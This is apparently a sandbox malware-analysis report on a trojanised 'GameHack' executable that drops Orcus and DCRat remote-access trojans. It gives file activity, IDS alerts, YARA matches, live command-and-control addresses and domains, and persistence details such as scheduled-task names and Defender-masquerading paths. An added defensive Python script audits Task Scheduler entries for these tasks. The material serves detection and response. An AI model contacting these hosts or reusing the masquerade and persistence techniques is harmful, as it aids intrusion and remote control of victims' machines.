                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Code function: 0_2_00A2AAA8 FindFirstFileExA,0_2_00A2AAA8
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Code function: 8_2_00EDA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,8_2_00EDA5F4
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Code function: 8_2_00EEB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,8_2_00EEB8E0
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Code function: 8_2_00EFAAA8 FindFirstFileExA,8_2_00EFAAA8
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | File opened: C:\Users\user\AppData\Local\Temp
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | File opened: C:\Users\user
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | File opened: C:\Users\user\AppData\Local
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | File opened: C:\Users\user\Documents\desktop.ini
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | File opened: C:\Users\user\AppData
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | File opened: C:\Users\user\Desktop\desktop.ini
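The CLSID the dropped Orcus client keeps resolving above, {0F87369F-A4E5-4CFC-BD3E-73E6154572DD}, is the Task Scheduler service class, which matches both the Microsoft.Win32.TaskScheduler PDB path found in memory and the extracted Orcus configuration (TaskSchedulerTaskName "sudik", TaskHighestPrivileges "true", respawn task "MpDefenderProtector", client installed under %appdata%\Windows\Defender\). A responder checking a host for this persistence does not need the COM service: task definitions are stored as XML under %SystemRoot%\System32\Tasks. The audit below is an added example, not code from the report, Joe Sandbox or Orcus. The two task names come from the configuration; the list of user-writable locations, the severity of each finding and the two sample task files are my own constructions.

```python
"""Audit Windows Task Scheduler definitions for RAT-style autostart tasks.

Added example (not part of the sandbox report).  Reads the XML task store
under %SystemRoot%\\System32\\Tasks directly (reading it needs admin rights)
and flags tasks that run binaries from user-writable paths, ask for
HighestAvailable run level, or carry a name seen in the extracted config.
"""
import os
import re
import xml.etree.ElementTree as ET

# Task names from the Orcus configuration extracted above; compared case-insensitively.
KNOWN_TASK_NAMES = {"sudik", "mpdefenderprotector"}

# Assumed heuristic: locations a standard user can write to.  A scheduled
# task that launches from here deserves a look regardless of its name.
USER_WRITABLE = (
    "%appdata%", "%localappdata%", "%temp%", "%tmp%", "%userprofile%",
    "\\appdata\\", "\\users\\", "\\programdata\\", "\\temp\\", "\\recovery\\",
)


def _ns_of(root):
    """Namespace URI of the task document (empty if the XML carries none)."""
    m = re.match(r"\{(.*)\}", root.tag)
    return m.group(1) if m else ""


def _tag(ns, local):
    return "{%s}%s" % (ns, local) if ns else local


def _first_text(node, tag):
    child = node.find(tag)
    return (child.text or "").strip() if child is not None else ""


def parse_task_bytes(data):
    """Decode a task file (UTF-16 with BOM on disk, UTF-8 otherwise) to an Element."""
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        text = data.decode("utf-16")
    else:
        text = data.decode("utf-8")
    # Drop the declaration so the encoding it names cannot disagree with the str we hand to expat.
    text = re.sub(r"^\s*<\?xml[^>]*\?>", "", text)
    return ET.fromstring(text)


def audit_task(name, root, known_names=KNOWN_TASK_NAMES):
    """Return a list of findings for one parsed task; an empty list means nothing odd."""
    ns = _ns_of(root)
    findings = []
    if name.strip("\\").lower() in known_names:
        findings.append("task name matches extracted RAT config")
    commands = []
    for exec_ in root.iter(_tag(ns, "Exec")):
        cmd = _first_text(exec_, _tag(ns, "Command"))
        args = _first_text(exec_, _tag(ns, "Arguments"))
        commands.append((cmd + " " + args).strip().lower())
    from_user_dir = [c for c in commands if any(m in c for m in USER_WRITABLE)]
    if from_user_dir:
        findings.append("runs from user-writable location: " + from_user_dir[0])
    run_level = ""
    for principal in root.iter(_tag(ns, "Principal")):
        run_level = _first_text(principal, _tag(ns, "RunLevel")) or run_level
    if run_level == "HighestAvailable" and from_user_dir:
        findings.append("elevated (HighestAvailable) task launching a user-writable binary")
    if from_user_dir and root.find(".//" + _tag(ns, "LogonTrigger")) is not None:
        findings.append("logon-triggered autostart")
    return findings


def sweep_tasks_dir(tasks_root=r"C:\Windows\System32\Tasks"):
    """Walk the on-disk task store; map task path -> findings for tasks with any."""
    results = {}
    for dirpath, _dirs, files in os.walk(tasks_root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            try:
                with open(path, "rb") as fh:
                    root = parse_task_bytes(fh.read())
            except (OSError, ET.ParseError, UnicodeDecodeError):
                continue
            rel = os.path.relpath(path, tasks_root)
            findings = audit_task(rel, root)
            if findings:
                results[rel] = findings
    return results


_NS = "http://schemas.microsoft.com/windows/2004/02/mit/task"

# Constructed sample task files (not captured from the sandbox run).  The first
# mirrors what the Orcus config describes; the second is a benign system task.
SAMPLE_SUSPICIOUS = ("""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="%s">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Principals><Principal id="Author"><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec>
    <Command>%%appdata%%\\Windows\\Defender\\MpDefenderCoreProtion.exe</Command>
  </Exec></Actions>
</Task>""" % _NS).encode("utf-16")

SAMPLE_BENIGN = ("""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="%s">
  <Triggers><BootTrigger><Enabled>true</Enabled></BootTrigger></Triggers>
  <Principals><Principal id="Author"><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\\Windows\\System32\\defrag.exe</Command>
    <Arguments>-c -h -o</Arguments></Exec></Actions>
</Task>""" % _NS).encode("utf-16")


if __name__ == "__main__":
    print(audit_task("\\MpDefenderProtector", parse_task_bytes(SAMPLE_SUSPICIOUS)))
    print(audit_task("\\Microsoft\\Windows\\Defrag\\ScheduledDefrag", parse_task_bytes(SAMPLE_BENIGN)))
    for task, hits in sweep_tasks_dir().items():
        print(task, hits)
```

Run it elevated on a suspect host and `sweep_tasks_dir()` lists every task with at least one finding; the constructed sample that matches the Orcus settings produces four, the benign one none. The user-writable-path check is deliberately independent of the task name, since "TaskSchedulerTaskName" is a per-build string and the respawn task can be renamed.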

                      Networking

                      Source: Network traffic | Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.7:49853 -> 37.44.238.250:80
                      Source: Network traffic | Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.7:49907 -> 37.44.238.250:80
                      Source: Network traffic | Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.7:50015 -> 37.44.238.250:80
                      Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49956 -> 37.44.238.250:80
                      Source: Network traffic | Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.7:50039 -> 37.44.238.250:80
                      Source: Solara.exe, 00000009.00000002.2515285033.0000000000401000.00000040.00000001.01000000.0000000D.sdmp | String found in binary or memory: m=nil base SundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecondhangupkilledlistensocketPREFIXSTRINGCLAUSEGetAceGetACPsendtoX25519%w%.0wServernetdnsdomaingophertelnetreturn.local.onionip+netCommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidicmd/goempty rune1 secretheaderAnswerLengthSTREETavx512rdrandrdseedError: booleanbdoUxXvintegercomplexfloat32float64LButtonRButtonMButtonControlCapitalConvertExecuteNumpad0Numpad1Numpad2Numpad3Numpad4Numpad5Numpad6Numpad7Numpad8Numpad9DecimalNumlockOEMPlusSetMenuUpgradeTrailersocks5hHEADERSReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGname %q:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTconsolePATHEXT19531259765625avx512finvaliduintptrSwapperChanDir Value>EllipseEndPageFillRgnAbortedpdh.dllIsChildSetRectforcegcallocmWcpuprofallocmRunknowngctraceIO waitrunningsyscallwaitingforevernetworkUNKNOWN:events, goid= s=nil
                      Source: Yara match | File source: 7.0.MpDefenderProtector.exe.240000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 13.2.MpDefenderCoreProtion.exe.46090d0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe, type: DROPPED
                      Source: Yara match | File source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe, type: DROPPED
                      Source: global traffic | TCP traffic: 192.168.2.7:49702 -> 185.37.62.158:25350
                      Source: Joe Sandbox View | ASN Name: HOSTLANDRU HOSTLANDRU
                      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global traffic | DNS traffic detected: DNS query: 25350.client.sudorat.top
                      Source: MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002949000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.000000000316A000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.00000000031C9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002ECA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002AFB000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003355000.00000004.00000800.00020000.00000000.sdmp, runtimesvc.exe, 00000017.00000002.1874336688.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, containerRuntime.exe, 0000001A.00000002.1720636580.00000000025B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002949000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.000000000316A000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.00000000031C9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002ECA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: MpDefenderProtector.exe, 00000007.00000002.1311661641.0000000000C6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or/XmasIes
                      Source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/I(.
                      Source: MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003355000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1366464067.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.00000000041DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://taskscheduler.codeplex.com/
                      Source: MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003355000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1366464067.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.00000000041DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://taskscheduler.codeplex.com/F
                      Source: Solara.exeBinary or memory string: github.com/lxn/win.getRawInputData

System Summary

Source: 13.2.MpDefenderCoreProtion.exe.46090d0.6.unpack, type: UNPACKEDPE | Matched rule: RAT_Orcus Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
Source: 13.2.MpDefenderCoreProtion.exe.46090d0.6.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 7.0.MpDefenderProtector.exe.240000.0.unpack, type: UNPACKEDPE | Matched rule: RAT_Orcus Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
Source: 7.0.MpDefenderProtector.exe.240000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 13.2.MpDefenderCoreProtion.exe.46090d0.6.raw.unpack, type: UNPACKEDPE | Matched rule: RAT_Orcus Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
Source: 13.2.MpDefenderCoreProtion.exe.46090d0.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: RAT_Orcus Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
Source: 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: RAT_Orcus Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
Source: 00000007.00000000.1286933996.0000000000242000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY | Matched rule: RAT_Orcus Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
Source: Process Memory Space: GameHackBuild1.exe.bin.exe PID: 7292, type: MEMORYSTR | Matched rule: RAT_Orcus Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
Source: Process Memory Space: MpDefenderCoreProtion.exe PID: 7932, type: MEMORYSTR | Matched rule: RAT_Orcus Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe, type: DROPPED | Matched rule: RAT_Orcus Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe, type: DROPPED | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe, type: DROPPED | Matched rule: RAT_Orcus Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe, type: DROPPED | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: Yara match | File source: 13.2.MpDefenderCoreProtion.exe.46090d0.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.MpDefenderProtector.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.MpDefenderCoreProtion.exe.46090d0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.1286933996.0000000000242000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: GameHackBuild1.exe.bin.exe PID: 7292, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MpDefenderCoreProtion.exe PID: 7932, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe, type: DROPPED
Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Code function: 0_2_00A0718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | File created: C:\Windows\security\database\SSblKNNQege.exe
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | File created: C:\Windows\security\database\f2aefc5695405c
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | File created: C:\Windows\Cursors\OfficeClickToRun.exe
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | File created: C:\Windows\Cursors\e6c9b481da804f
Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | File created: C:\Windows\SoftwareDistribution\Download\9dbde960dbff0b004ef17a0616c3a8ef\RuntimeBroker.exe
Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | File created: C:\Windows\SoftwareDistribution\Download\9dbde960dbff0b004ef17a0616c3a8ef\9e8d7a4ca61bd9
Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | File created: C:\Windows\L2Schemas\SSblKNNQege.exe
Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | File created: C:\Windows\L2Schemas\f2aefc5695405c
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Code function: 0_2_00A0857B
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Code function: 0_2_00A16646
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Code function: 0_2_00A170BF
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Code function: 0_2_00A2D00E
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Code function: 0_2_00A0407E
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Code function: 0_2_00A31194
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Code function: 0_2_00A0E2A0
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Code function: 0_2_00A03281
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Code function: 0_2_00A202F6
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Code function: 0_2_00A027E8
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Code function: 0_2_00A137C1
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Code function: 0_2_00A2473A
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Code function: 0_2_00A2070E
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Code function: 0_2_00A0E8A0
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Code function: 0_2_00A0F968
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Code function: 0_2_00A24969
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Code function: 0_2_00A13A3C
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Code function: 0_2_00A16A7B
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Code function: 0_2_00A2CB60
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Code function: 0_2_00A20B43
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Code function: 0_2_00A15C77
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Code function: 0_2_00A1FDFA
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Code function: 0_2_00A0ED14
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Code function: 0_2_00A13D6D
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Code function: 0_2_00A0BE13
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Code function: 0_2_00A0DE6C
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Code function: 0_2_00A05F3C
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe | Code function: 0_2_00A20F78
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe | Code function: 7_2_027D87F0
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Code function: 8_2_00ED857B
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Code function: 8_2_00EE70BF
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Code function: 8_2_00ED407E
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Code function: 8_2_00EFD00E
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Code function: 8_2_00F01194
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Code function: 8_2_00EF02F6
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Code function: 8_2_00EDE2A0
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Code function: 8_2_00ED3281
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Code function: 8_2_00EE6646
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Code function: 8_2_00ED27E8
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Code function: 8_2_00EE37C1
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Code function: 8_2_00EF473A
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Code function: 8_2_00EF070E
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Code function: 8_2_00EDE8A0
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Code function: 8_2_00EDF968
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Code function: 8_2_00EF4969
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Code function: 8_2_00EE6A7B
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Code function: 8_2_00EE3A3C
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Code function: 8_2_00EFCB60
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Code function: 8_2_00EF0B43
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Code function: 8_2_00EE5C77
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Code function: 8_2_00EEFDFA
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Code function: 8_2_00EE3D6D
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Code function: 8_2_00EDED14
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Code function: 8_2_00EDDE6C
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Code function: 8_2_00EDBE13
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Code function: 8_2_00EF0F78
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | Code function: 8_2_00ED5F3C
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe | Code function: 9_3_0014C1A1
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe | Code function: 9_3_0014BF1A
Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | Code function: 13_2_017D87F0
Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | Code function: 17_2_015787F0
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: String function: 00A1E28C appears 35 times
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: String function: 00A1ED00 appears 31 times
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeCode function: String function: 00A1E360 appears 52 times
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: String function: 00EEE360 appears 52 times
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: String function: 00EEED00 appears 31 times
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeCode function: String function: 00EEE28C appears 35 times
                      Source: containerRuntime.exe.8.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: PxMOoBdB.log.23.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: WmQvmhxk.log.23.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: mOMkzqHG.log.23.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: BpJZMyRc.log.23.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: jdhUscxN.log.23.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: QLuoYXmy.log.23.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: wowiEjmi.log.23.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: ErvIhhWY.log.23.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: syFrxmlp.log.23.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: brpMezGb.log.23.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: SSblKNNQege.exe.26.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: RuntimeBroker.exe.26.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: SSblKNNQege.exe0.26.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: SSblKNNQege.exe1.26.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: SSblKNNQege.exe2.26.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
